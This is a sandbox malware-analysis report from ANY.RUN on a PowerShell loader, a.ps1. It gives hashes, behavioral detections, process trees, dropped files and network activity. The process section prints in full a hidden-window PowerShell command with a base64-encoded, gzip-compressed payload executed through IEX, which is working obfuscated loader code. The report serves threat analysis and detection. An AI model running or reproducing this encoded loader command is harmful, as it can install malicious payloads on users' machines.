File name:

a.ps1

Full analysis: https://app.any.run/tasks/5f9805c0-02ce-482f-b2f5-cd9b608711e8
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 11, 2025, 00:13:34
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
susp-powershell
reflection
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (7430), with no line terminators
MD5:

DCCD6A25F1EEA026430A003FF266057C

SHA1:

E8B8A6BA8EE2D5FF2AEAF7D108B97D1CB2D3976B

SHA256:

674E73DEA9D542A14F98BD7BCCE35E71BBF3DA871407778BFB7467441FED80AB

SSDEEP:

192:LqFIsRrxxdCF8UqqM7uf8+GeLIIQyQhNDPxohtT:WF9jdCOUqqadkLI/3DPChtT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6472)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1580)

  • SUSPICIOUS

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6472)
      • powershell.exe (PID: 7096)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6472)
      • powershell.exe (PID: 1580)

    • Executes script without checking the security policy

      • powershell.exe (PID: 6472)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 1580)
      • powershell.exe (PID: 6472)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 1580)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 1580)

    • Application launched itself

      • powershell.exe (PID: 1580)

    • The process hides Powershell's copyright startup banner

      • powershell.exe (PID: 6472)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 1580)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7096)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7096)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6472)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 1580)

    • Found Base64 encoded compression PowerShell classes (YARA)

      • powershell.exe (PID: 1580)

    • Checks proxy server information

      • powershell.exe (PID: 7096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
131
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1580"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Downloads\a.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
448\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6472"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADIALwBpAFMAaABMADkASABIADYARgBQADAAUQBDAGEAdwBqAFgAWQBQAEsAYQBWAGEAUwB4ADgAUQBNAEQAZABzAEQAbQBuAFIAdABGAGoAYgBzAHgASgBuADUAaAB0AHcARgB6AFoALwA3ADcATABSAHYASQB6AGUAdwBrAHUAeQBQAHQASQBsAG0AMAB1ADYAdQBxAHEAMAA2AGQAcgBpADUAYgBoAEYANQBaAE4ASABaAHQAcQBvAGUAWQBNAEYAZABqAEUAaQBkAHUARwBEAEMATgBVAHUAbABTAEMAagBYAEsAUABEAEQAZgB5AHEAVgBsAEcAdABnADAAbgA4ADQASABMAHcANgBoAEwAMQBFAGMAMgBpADgASQA0ADUAZwBrAEMAZgBOAFgANgBhAEsAUABZAHUAUQB6AGwAYwBzAHQAaQBsAC8AOABFAEsAYwBlAHEAVABMAEYAUwB5ADUASQBjAEIAbwBUADkAdQBLAGkAZABGAEYATQBwAFUARwBDAGwAdQBRAGwAUQBOAFQAZABrAGgAZQBmADAARgBXAEkARQA5AGkAbwA4AGkAUgBFAGsAUgBUADYAeQBBADIAZQB2ADMANQB0AHAAWABGAE0AQQBuAHAAOAByADYAbQBFAEMAawBsAEMALwBJAFgAbgBrAHEAVABDAE0AdAArAFoAeQBZAHIARQA1AE8AcAB4AHMAUwBZADIAWgBmADUAaQBMAGwAOQBxAHEAaABjAHUAawBIAGMAUwB5ADEAcgBJAFgAawBGAEEAUQBvAEQAegB0AFYANQBvAG8AegB5AEMAbQBoAFYANQBMAHEAMgBVAC8ALwB5AHoAegBEADUAZAAxAFoAOQByADgAaQBaAEYAWABsAEkAcABXADEAbABDAGkAVgAvAEQAbgBsAGQAbQBtAFIAOQBzAHYAdQBFAHcAaQAwAGkAbAByAEwAdAAyAEgAQwBiAGgAawB0AFkAbQBiAHMAQQAzAGEAcQBQAEMAZQA2AE4AdwBYAGoALwA2AFgAbQBaAFAAawBUAGsAUgBnAGoAZwArAEQAegBLADMAZQB0AFMAcABsAEcASABZAEIAMgB5AEUASQA0AGIAbABLAHYATwBVADcALwBmADAALwBNAHgAOABlAC8AUABHAFQAQQBQAHEAKwBxAFMAbQBCAFoAVABFAFkAVwBTAFIAZQBPAHYAYQBKAEsAbQAxAFUAWQBBADkAWQBwAEkAbABxAEoAVQBUAFMARgAvAGcAbABGAGwAdwBJAGkAWQAwAGoAUQBQAG0ANwBBAHYAbwBiAGMATgBYAFUAcgBrAE0AVQBzACsAcgBnAHQAMgBuADMANwBYADcAWABEAEgASQA3AGcAegB1ADcAeQBwAFYAMwBpAHUAQgBWAEoALwBHAGIAUABYAEUAaQBkACsAQgBRAHkAOQA0AGMAegBRAEgANABmAHoAaQAvAFQAdAB5AHMAZgBEADcAaABXAEIAcwA2AFUAZgBwAEEANgBwAGkANABoAEUASABVAGYASgBDAEEAZAA5ADMAWABDADEAZABYAEQAdwBWAFEAdwBMAHgAVgBQAHAAaAA0AGgAWgA2AEQAdwB4AFgAWgBYAFIAdwBBAHQARQB3AHoAdgBKADAARAB1AE8AVQBzAE0ALwAvADUATwBlADQANwBWAGsAegBxAFgANQBxAHEASAA3AFcATwB1AGsAYwAwADMAUAAwADQANABGADUARwBvAGMAdQBmAGkANQBkAHMASwBVAFQAZQAvAEwANQBsADAAWABxAGUAcABqAEUAKwBmAHIAbgBwADAARQBpAFMAegBjAGcAVQBoAFkAZwAzADcAWABQAGgASwA5ADgAbABEAE8AeQA5AEUAaQBCAFIAKwAwAHMAWgBvAEMAZgBsAGYASgBwAGcAVwBEAHAAaABFADQANQBCAC8AVABwAFYAegBYAFoAZAArAG0AYgByAG4AaAAwAFQAcgBBAGgANwB3AGwANABCAFoAUgBnAGYAMwBiAG0AbQBNAE4ASwBXAFEAdAAwADQAZwBOACsAeAAzAGUAZwA2AGUAVQBTAGoAaABrADUAUwA1ACsATwBWAG4AYgBlAFAAWAAvAFAAdQBkAHoAeQBVAEoASgBVAG0AWAA0AEsANQA5AHkAdQBNAGgAWgBCAEgAcwBGAFYAUgBnAGcAUwA5ADcAUQBrAHAARABRAHMAaAB1AFYALwAzAE4AVgBUAGoANwBvADIAUwB1AGoAWgAzAEQAUAA3AEEAYQBTAG4AcgBWAHQAaABBAEMAYwBtAHQAUwBHADcAQQBNAFAAUQBpAG8AagB0AEkAaQA5AEgAcABjAHEAMABYAFUAegBFAHoASABLAGQAcwB3AHYAbABEAHoARgBwAEkAYwArAEQASQB3AGUAVwB0AHAAQQBUAG0ATQBtAHgAcwBHAGoATwBtAFIAaABYAC8ANQAwAGYAYgBNADAAaQBWAFAATQBqAGoALwBnAGcAWABWAFEAaAB4AFUATQBPADEASgB6AFQAaQBTAHIAbwBoAGgAeQBDAHkALwAvAEIANwBmAE0ANQBPAFIANgBLAEgASwBzAHoAUwBPACsAYwBCAGcASgBZAFgAawBpAHIAegBOAGkATgBLAGQAUwAxAGMAdgBVAFgANAB2ADEAdgA3AHYAMQBjAFkAbgA1AHkAcwB4AFcAVABVAHkASQByAHgAVQBGADgARQBqAE8AYQBIADUAZABDADAAcwA0AHYAbAA0AGMAMwBMAEEAdgBrAFkAZwBxAG8ASwBYAEgAbwBpAHkAZwBoAE4AMAAyAHIASwBHAE8AVgBNAG4AKwBYAGIAcgBSAE0AWAB3ADkAdQBZAGwAWABlAEsAdQAxAE4AVwB4ADcAQwBzADQAVwBIADMAeQBoAHkAcgA5AGMAeABJADkASABzADIAWABMADYAMgBHADkAegBuAGEAVQAyAHUASgBPAGEANgBTADcAVgAwAHEASABJADgAUQBvAEgAYwBvAGUATgBLAGkAKwAxADcAVwBNADQAcQA2AGQAKwBzADQANABqAGIAVwB2AEEAWABIAEsANwBhAFMAZQBTAHQAcABXAEUAZABtAE0AVABLAGoAZQBPAGUAMwArAHkAYwA5AFEAZgBMAEgAYgAxAHgAVgBSAFQAYgBoAGUAcQAwAG0AeQBQAEUAeQBXAFgAYgAyAHQAYgBVAGQAbQAwADcAawBNAFkALwA2AEYAdABXADIARQBIADkATwA1AHUAbwBrAEQAYwA0AFMAYQBSAE8AegBkAGsAMgByAE4AMwBQAEwAMABqAHkATgBsAG4AMwBmAEUAWABpADYAdQByADQAOAB6AG8AagBlAFgASQBzAEEATABjAFcAOQBRAEgAUwBzAGMANABOAEcAUwA2ADUAMwBEAGIANQBMAEMAYwB6AFAARgA0AEkALwBQADkAUgBUAGUAQwBPAEQAWABlAHMAVwA2AEMAVABtAFoAWgBZAG0AYQAvADAAawBNAGUAdQA5ADAAMgBlAHIAaQA3AHUAYgB2AEcAaAAwAGEAbQBHAEUAMwBBAFkAVwA5AGwAKwBtAHAAMgBnAC8AZgAyAFYATgBuAFoAVQA2AE8AWAB0AFcAZQBHAEMAbgBZADMANgBjAFIAcAB0AG4AVwBMAEIAOQBzAFcAMwB1AC8AdwBLAEgAbgBzAEQATwBtAE0ANwB5AE8ALwBtAFcAVgBCAHMANgBXAHQAdABYADMAUABqAHUAaAA0ADIAcgBtAEoAVQBkAGEASwBlAGkANQBaAGkARQB1AGEANgAzAFoANgBjADYAZAB6AEwAOQBPAGoAZgA1AFoAbABaAGgAaABzAGUAKwAyAGgAMQBBAFgAYgBRAFUAdgBYAHcAUgA5ADAAcgBaAEEAUgB5AEgAUQBUAEYAMgB6AGQAeABSAHYATgAxAGQAZgBaAHoAZAByAG0AagBaADAAKwBWAHYAUgBIADYANwBVAHUARABPAHYAegB0AHUAawBKAE8AbwB6AGgAUAB6AEYATQBPAFYASwAwAC8AVAB3AFIAQQBsADIAZABOAFQAbwBIAEkAdQBJAC8AYgBOADYANwBWAFYAWgAyAHoAKwBhADUAcgBxAEsASwBUAG0AdABsAEUAcgBFAHgAMwA4AHoAVQB6AGwANABLAFIASAA3AG0AMQA0AE4AWgBvAEEAUwBTADMANgBHADQARQBkAFYAUgBvAEQAUgBzADQAWgBxAGYAdwA1AHIAVwBFAFAAWABoAHEASwA0AE8ARgBOAHcAZAB5AHQAeABjADQATQBUACsAVQBCAEgAVgBuAHUAdQA1AEEAMQBsAFUAUgAzAFgANwBjAGMARgAxAEQARgBPAFoAdAAwAHgANQBCAHUAdABqAFUALwBMAEYAVwBOAG8AWgB5AHMAaABjAFcAZQAyAFYAYgBxAGoATwBuAFcAUwArAGMAcgBQAFIAcQBqAG0AVQB6AEsAUQB2AGMARgBoAFYARgBZADMASQBPADIANABrADcAZgBUAE8AYQBUAHcAQgBtADQAMgBSAFAAQQBmADkAagBtAHkAKwAxAHEAZgBxAHcARQBpAEgAaQB0AGMAZABjAHYAYwB0AFMAWgB3AFoAOABrADcAdgBZAGMAaQB2AHkAZQAxAEgASQA4AEUANABXAE4AegBlAE0AQgAzAGQAQQB0ADIAaABLAGgAagB1AGMASQBUAE4AbwBSAHkAMQBoAGYAMABJAFoARABrAEwANQBsAEwAcgBWAFQAVABCAFgAOQAwAGMAMgB6AE8AQgBWADEASgBwAHAAVgBuAEsAUwB1ADQASwBqAGMANQB3AHgATgAyAHIAVwBKADYATABTAEkANgBtAFkASAArAGcAQwBOAHgAQQBHAGUAZwA5AHAARgBKACsANABkACsAQgBuAC8AZABkAFMANQA1AEoAYwAzAGsAdQB3AEMAYgBkAG4AdgB1ADYAVgB2AHgAZAB5ADkANwBOADEANwBQAEEAYQBDAHIAOAAvAFkARgBNAGsANABtAHkAbwA0AGYAbABJAEIAegBOAFYASwBHAHIAQQBJAGYAbgBmAHUAVABNAEEAdgBuAFIAYgBtAE4AMwBNAGMARwB1AFAAYgBFAGYAQQBXAE0AZQBCAGUATwBOAFAAWgAzAHYAcABBAEQANwBkAHQAdAArAG4ARQArAGkANwBkAHoAUgAyAG0AaQAzAGkAbAB1AFcAUABsAGsASQBuAFkAUABvAEcANgA3AE4ATwA5AE0AbABiADEAeQBUAC8AVwB6AGEANABvADEANwB5AEoAYwB6AEUAOABMAFIAMQBNAEUAKwA4AGsAWABYAHQAbwB3AGUAZAA0ADEARQBEAEQAeQAxAEoAawBaAFAATwB3AEMAZgB1AFcAUwB0AE4AZgBRADEAbAB1AG4AdABpAHAAZABVADQATwBIAE8AQgA3ADQAQQBqADkAdwB2AFEAVwBlADMAUwBZAEMAbgBtAFMANQBwAG0AWgBGAHoAZABVADkAUgBMAEIAWgBjAHIAUwArADkAVABXAHYAZwBOAHIAdQBMADkAVABpAFoAMwB6AGIAMQB0AE0AdgBUAGcAeQAyAHYARQBrAE0AMgA5AFoARgBrAEQAaABhAFMASwBVAC8AeQA4AHcASABQAFEAMQA2AE4AbABtAEUATQAvAGMAVQArAHYANwBQAC8AeABjAEQALwBsAFUAZQBaAHQAMwBvAEQAVgBRAFkASwBXAEQANwAvADUAUQB1AGIAMwAvAHQAdgBLADAAKwBYACsAKwBkAHoAbgAvAGIAMgBmAHIAWABZAGcAegBYACsATwBxADkAZAB4AGMAbwBXAHYAYQB0AFkAbgB6AFUALwBPAG8AcQBUAEYAZgBLAGcAawBrAEUARABjADcANQArAGwARABCAFcAVABtADEASQBQADMAUgB6AGoAVQByAGwANAA4ADcANQBsAGMAUQBCADgAYQBDAHIAaABMADcAegBYAEwAUQBGAHoAdwB2AHQAdgBIAEgANgBwAEkATwBCAE4AdQA3AFkAWABEADMARAA1AFQAUwBDAEkAZAAvADQAYwBNAFEAeQBiADQATABRAEwAUgAxAGoAVwBxAFQATABaAGQARgBjAG4AQwBJADgAOQAxAGgAbgB3AGEAOQBmADUAeABCAGUAOQBSADIASQBQAFIASQA0AGQARgBWAGwAdQBEADMAUABjAFYAegArADMAKwBUAFkAMAB1AC8ARAAwAGcAcQBqAHIAUABKAG0AcgBwAG8AMwBWACsAOAA4AGUAYgArAFQAVgArAHoARQBuAHQAQwBQADAAOABBAG4ALwA4AGMARQAvAEwAVABwAGYANABjADIAQgA2AC8AbwB6ADkANgBnAEsAeAB6ADYARwBDACsAMgBWAFAANQBXAEsAbQBsAEwANQB0ADEAOAA0AGgANwBnADYANABOAHMAbQBMAHUAQwBlAHcAbgBRAG4ARgA2AHQAdwB3AFYAOABxAGgAUgAzAGIAKwBVAFMAcwBZAHcAbQBUADUAbABMAHgAUAB4AGcAcgBpAEEAOABJAGUARQBiADgATAAwAFMATwAyAGwAKwBFAFQAUABIAHoANgAvAHYAegBBADYANQBSADgAWAB2AGoARQBsAHMAQQB1ADMAegBWAFMAZABjAEEARQBzAEoAOQBGAE8ANQA2AGMASgBJAEwAZwB4AHoAZgB3AE4ANgBaAEgAUgA5AHoAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
7096"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1768843639
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
7108\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
13 522
Read events
13 522
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
7096powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cni2mzgm.t1j.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1580powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d41vwwkm.mes.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF13518e.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6472powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yqeasupm.2ux.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7096powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4jtmxyg1.qwl.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1580powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0uc5nllx.d0w.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7096powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-ServerModebinary
MD5:FFCC89D0B25331AB4D09BED6618D74F2
SHA256:980786C3AC52C3AB5948D0812E305F2719D2F2345705DB0B34BD0E91AD0BAF57
6472powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pbqkf0if.cgh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6472powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C4AEDB17469CB221E4AD0DF9B403BDD7
SHA256:CC180CF4044417D561FB3FC2A22F9D948EA584FB3CDCD353551B3B80AAA31CAE
6472powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:77AB86320529E2AD069AFB5ACD64789D
SHA256:5F75F7A8868BAC50BBF7F3BCA209E67895DC836F3EFD177B87C7AF8297B11933
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
34
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6276
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4516
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4516
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4712
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.46
whitelisted
login.live.com
  • 20.190.159.75
  • 20.190.159.23
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.73
  • 40.126.31.69
  • 20.190.159.68
  • 20.190.159.4
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
fd.api.iris.microsoft.com
  • 20.74.47.205
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
a.ps1